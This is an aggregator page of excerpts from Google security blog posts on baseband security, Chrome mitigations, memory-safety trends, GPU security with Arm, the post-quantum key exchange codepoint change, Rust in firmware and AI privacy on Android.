If you’d like to follow along, keep an eye on our coverage dashboard as it expands to cover UI code.

1 month, 4 weeks ago @ security.googleblog.com
Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems

Most smartphones use cellular baseband processors with tight performance constraints, making security hardening difficult.

The Cellular Baseband
The cellular baseband within a smartphone is responsible for managing the device's connectivity to cellular networks.

The firmware within the cellular baseband, similar to any software, is susceptible to bugs and errors.

For example, 0-day exploits in the cellular baseband are being used to deploy the Predator malware in smartphones.

Pixel's proactive approach to security demonstrates a commitment to protecting its users across the entire software stack.

2 months ago @ security.googleblog.com
Evaluating Mitigations & Vulnerabilities in Chrome

The Chrome Security Team is constantly striving to make it safer to browse the web.

We invest in mechanisms to make classes of security bugs impossible, mitigations that make it more difficult to exploit a security bug, and sandboxing to reduce the capability exposed by an isolated security issue.

Historically the Chrome Security Team has made major investments and driven the web to be safer.

In the longer-term the Chrome Security Team advocates for operating system improvements like less-capable lightweight processes, less-privileged GPU and NPU containers, improved application isolation, and support for hardware-based isolation, memory safety and flow control enforcement.

Good Bugs and Ba…

2 months ago @ security.googleblog.com
Eliminating Memory Safety Vulnerabilities at the Source

Memory safety vulnerabilities remain a pervasive threat to software security.

We’ll also share updated data on how the percentage of memory safety vulnerabilities in Android dropped from 76% to 24% over 6 years as development shifted to memory safe languages.

This decision was driven by the increasing cost and complexity of managing memory safety vulnerabilities.

We first reported this decline in 2022, and we continue to see the total number of memory safety vulnerabilities dropping³.

As the number of memory safety vulnerabilities has dropped, the overall security risk has dropped along with it.

2 months, 2 weeks ago @ security.googleblog.com
Google & Arm - Raising The Bar on GPU Security

Arm Product Security and GPU Teams
Arm has a central product security team that sets the policy and practice across the company.

Working together to secure Android devices
Google’s Android Security teams and Arm have been working together for a long time.

So “application ⇒ kernel ⇒ firmware ⇒ kernel” is a known attack flow in this area.

The Arm Product Security Team is actively involved in security-focused industry communities and collaborates closely with its ecosystem partners.

The Android Red Team and Arm continue to work together to proactively raise the bar on GPU security.

2 months, 2 weeks ago @ security.googleblog.com
A new path for Kyber on the web

We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients.

The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber.

As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519.

Post-quantum cryptography is too big to be able to offer two post-quantum key share predictions at the same time.

Longer term, we hope to avoid the chicken-and-egg problem for post-quantum key share predictions through our emerging IETF draft for key share prediction.

2 months, 3 weeks ago @ security.googleblog.com
Deploying Rust in Existing Firmware Codebases

The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.

The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API.

Choosing a Pre-Existing Crate (Rust Library)
Picking the right open-source crate (Rust library) to replace the chosen component is crucial.

```rust
// Crate-level attribute: build without the standard library by default,
// pull std back in only when the "std" feature is enabled, and use alloc
// for heap types such as Vec and String.
#![no_std]
#[cfg(feature = "std")]
extern crate std;
extern crate alloc;
```
Then, iteratively fix all occurring compiler errors as follows: move any `use` directives from `std` to either `core` or `alloc`.

Memory Safety for Firmware, Today
Using the process outlined in this blog post, you can begin to introduce Rust into large legacy firmware…

3 months ago @ security.googleblog.com
Private AI For All: Our End-To-End Approach to AI Privacy on Android

As a pioneer in responsible AI and cutting-edge privacy technologies like Private Compute Core and federated learning, we made sure our approach to the assistant experience with Gemini on Android is aligned with our existing Secure AI framework, AI Principles and Privacy Principles.

From privacy on-device when handling sensitive data to the world’s best cloud infrastructure, here are six key ways we keep your information private and protected.

For some AI features, like Summarize in Recorder on Pixel, that benefit from additional data privacy or processing efficiency, we utilize on-device AI.

It can be thought of as extending the user’s device and its security boundaries into our cloud infr…

3 months, 3 weeks ago @ security.googleblog.com